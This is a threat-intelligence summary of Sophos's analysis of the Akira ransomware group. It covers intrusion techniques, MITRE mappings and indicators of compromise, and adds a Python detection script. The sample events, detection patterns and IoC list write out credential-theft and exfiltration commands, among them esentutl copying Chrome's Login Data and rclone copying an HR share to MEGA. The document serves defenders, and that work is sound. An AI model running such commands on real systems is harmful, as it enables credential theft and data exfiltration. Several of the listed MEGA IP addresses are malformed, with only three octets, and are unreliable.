Akira, again: The ransomware that keeps on taking

Sophos’ analysis shows Akira expanding from ransomware deployments toward extortion-focused operations with data exfiltration as a primary objective, alongside ongoing encryption activity across multiple regions and sectors. The attackers employ a wide range of credential-access, defense-evasion, and C2 techniques, including AnyDesk for remote access, Veeam credential dumping, and SMB/RDP-based lateral movement, while occasionally using bespoke backdoors and multiple ransomware variants.
#Akira #AnyDesk #Veeam #MEGA #WinRAR #rclone

Keypoints

  • Akira actors are increasingly performing extortion-only operations, exfiltrating data without encrypting systems in some incidents.
  • Megazord ransomware was observed in only one case; most attacks used the Akira ransomware family with multiple binary names (e.g., w.exe, Lck.exe, 1.exe, locker.exe).
  • A previously unreported backdoor executable used for C2 indicates a shift toward new persistence mechanisms beyond dual-use remote-access agents.
  • Defenses are frequently targeted: actors attempt to uninstall or disable Sophos, and sometimes disable Windows Defender before or during activity.
  • Initial access commonly occurs via unauthorized VPN logons without MFA, including exploitation of Cisco VPN vulnerabilities (CVE-2023-20269).
  • Credential access and discovery techniques are broad: LSASS memory dumps, NTDS.dit/NTDSUtil offline dumps, Veeam credential dumping, browser credential harvesting, and AD/Group enumeration.
  • Lateral movement relies on RDP with cached local admin accounts, SMB with RDP, and tools like wmiexec/PSEXESVC; discovery uses Get-ADComputer and AD group queries.
  • Exfiltration uses WinRAR, rclone, and MEGA, with large data transfers to attacker-controlled IPs and occasionally compression into ZIP/RAR archives before exfiltration.
  • Impact typically includes encryption of files (akira extension) and ransom notes, with dwell times ranging from <1 day to 25 days.

MITRE Techniques

  • [T1133] External Remote Services – Akira actors access VPNs without MFA to gain initial access. ‘unauthorized logon to VPNs by accounts lacking multi-factor authentication (MFA). Typically, Sophos observed Akira actors specifically targeting Cisco VPN products without MFA enabled’
  • [T1190] Exploit Public-Facing Application – CVE-2023-20269 exploited in Cisco ASA to establish unauthorized remote access. ‘exploited CVE-2023-20269 in an organization’s Cisco ASA’
  • [T1003.001] OS Credential Dumping – LSASS memory dump and in-memory credentials. ‘minidump of the LSASS process memory and acquire additional credentials stored in memory’
  • [T1003.004] NTDS – NTDS.dit offline dumps and related tooling. ‘NTDSUTIL-CREATE-FULL-1’ and ‘NTDS.dit’ with offline capture commands
  • [T1003.005] OS Credential Dumping (Veeam) – Veeam Credential Dumper scripts to dump credentials from Veeam backup service. ‘Veeam Credential Dumper scripts to dump credentials stored in the Veeam backup service to plaintext’
  • [T1555.003] Credentials in Web Browsers – Chrome credentials harvested from user data. ‘cached Chrome browser credentials’
  • [T1047] Windows Management Instrumentation – wmiexec used to move laterally. ‘wmiexec to perform lateral movement’
  • [T1059.001] PowerShell – PowerShell ISE session used for credential dumping operations. ‘interactive PowerShell ISE session’
  • [T1562.004] Impair Defenses – Uninstalling/disabling security tools (Sophos/Defender). ‘uninstall Sophos endpoint’ and ‘disable Windows Defender real-time monitoring’
  • [T1021.001] Remote Desktop Protocol – RDP used with local admin accounts for lateral movement. ‘RDP with valid local administrator user accounts’
  • [T1021.002] SMB – SMB used in conjunction with RDP for lateral movement; ransomware spreads over SMB. ‘encrypted via SMB shares’
  • [T1547.001] Registry Run Keys/Startup Folder – SpecialAccounts registry key used to persist. ‘Special Accounts registry key’ to maintain logon persistence
  • [T1136] Create Account – New user/domain groups created and added to administrators to persist. ‘create a new domain group … added’
  • [T1543.003] Create/Modify System Process: Windows Service – nssm.exe used to create a Sysmon service to enable tunneling. ‘service sysmon’ creation
  • [T1560] Archive Collected Data – Data compressed into RAR archives before exfiltration. ‘compress approximately 34GB of data into multiple archive files’
  • [T1041] Exfiltration – Data exfiltrated to attacker-controlled IPs via Chrome, rclone, MEGA. ‘exfiltrate data to their attacker-controlled IPs’
  • [T1486] Data Encrypted for Impact – Akira encrypts files with the “akira” extension and deletes Shadow Copies. ‘encrypt files with the “akira” extension’
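As an added detection example, not code from the Sophos report, the following Python checks constructed process- and file-creation events against several of the behaviours listed above (esentutl copying Chrome Login Data, nssm installing a ‘sysmon’ service, rclone/WinRAR staging and exfiltration, .akira files and the ransom note). The event field names, usernames, host names and paths in the sample data are assumptions.

```python
import re

# Constructed sample telemetry (not from the Sophos report): process-creation
# events carry a command line, file-creation events carry a target path.
SAMPLE_EVENTS = [
    {"cmdline": r'esentutl.exe /y "C:\Users\jdoe\AppData\Local\Google\Chrome'
                r'\User Data\Default\Login Data" /d C:\temp\ld.db'},
    {"cmdline": r"nssm.exe install sysmon C:\temp\sysmon.exe"},
    {"cmdline": r"rclone.exe copy D:\Shares\HR mega:hr-backup -P"},
    {"cmdline": r'WinRAR.exe a -r "C:\temp\Benefits.rar" \\fs01\HR'},
    {"cmdline": r"svchost.exe -k netsvcs"},  # benign, should not match
    {"target": r"\\fs01\HR\payroll.xlsx.akira"},
    {"target": r"C:\Users\jdoe\Desktop\akira_readme.txt"},
]

# (technique id, description, event field, pattern), drawn from the TTPs above.
RULES = [
    ("T1555.003", "esentutl.exe copying the Chrome 'Login Data' database",
     "cmdline", re.compile(r"\besentutl(\.exe)?\b.*\\Login Data", re.I)),
    ("T1543.003", "nssm installing a service named 'sysmon' (tunneling service)",
     "cmdline", re.compile(r"\bnssm(\.exe)?\s+install\s+sysmon\b", re.I)),
    ("T1041", "rclone copy/sync/move to a named cloud remote such as MEGA",
     "cmdline", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b.*\s[a-z][\w-]+:", re.I)),
    ("T1560", "WinRAR creating a .rar archive (staging data before exfiltration)",
     "cmdline", re.compile(r"\bwinrar(\.exe)?\s+a\b.*\.rar\b", re.I)),
    ("T1486", "file with .akira extension or akira_readme.txt ransom note written",
     "target", re.compile(r"(\.akira|\\akira_readme\.txt)$", re.I)),
]

def detect_akira_ttps(events):
    """Return (technique_id, description, matched_value) for every rule hit."""
    hits = []
    for event in events:
        for tid, desc, field, pattern in RULES:
            value = event.get(field, "")
            if pattern.search(value):
                hits.append((tid, desc, value))
    return hits

def summarize(events):
    """Map technique id -> number of matching events, for quick triage."""
    counts = {}
    for tid, _, _ in detect_akira_ttps(events):
        counts[tid] = counts.get(tid, 0) + 1
    return counts

if __name__ == "__main__":
    for tid, desc, value in detect_akira_ttps(SAMPLE_EVENTS):
        print(f"[{tid}] {desc}: {value}")
```

The rclone pattern requires a remote name of at least two characters before the colon so that ordinary drive letters such as `D:` do not trigger it.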

Indicators of Compromise

  • [File] w.exe, Lck.exe, 1.exe, locker.exe – ransomware binaries observed in multiple incidents. ‘the ransomware binary had names such as w.exe, Lck.exe, 1.exe, locker.exe’
  • [File] akira_readme.txt – ransom note left on victims’ devices. ‘ransom note named “akira_readme.txt”’
  • [File] Former Employee’s Data.rar, Benefits.rar, Workerscomp.rar – exfiltration archives created and uploaded.
  • [File] ck.exe; malicious service ‘sysmon’ created with nssm.exe to launch tunneling tools. ‘the malicious service ‘sysmon,’ which executed sysmon.exe and launched tunneling tools’
  • [File] AnyDesk.exe, dwagent.exe – remote-access tools used for C2. ‘AnyDesk to establish persistent remote access’ and ‘dwagent.exe’ installer
  • [File] chrome.exe and related Chrome data access scripts – browser credential access. ‘chrome credential dump via Chrome data’
  • [IP] 170.130.165.171; 13.107.42.12; 185.82.216.56; 104.200.72.33 – attacker-controlled IPs for data exfil
  • [IP] 99.35.22; 206.25.71; 203.127.13; 99.35.202 – MEGA file-sharing service IPs used for exfil
  • [Tool] Mimikatz.exe; BypassCredGuard.exe; WebBrowserPassView.exe – credential extraction and password-stealing tools
  • [Tool] esentutl.exe – Chrome credentials extraction operation. ‘esentutl.exe /y “C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data”’
  • [Tool] Veeam Credential Dumper (scripts) – credential dumping from Veeam backups. ‘Veeam Credential Dumper scripts’

Read more: https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/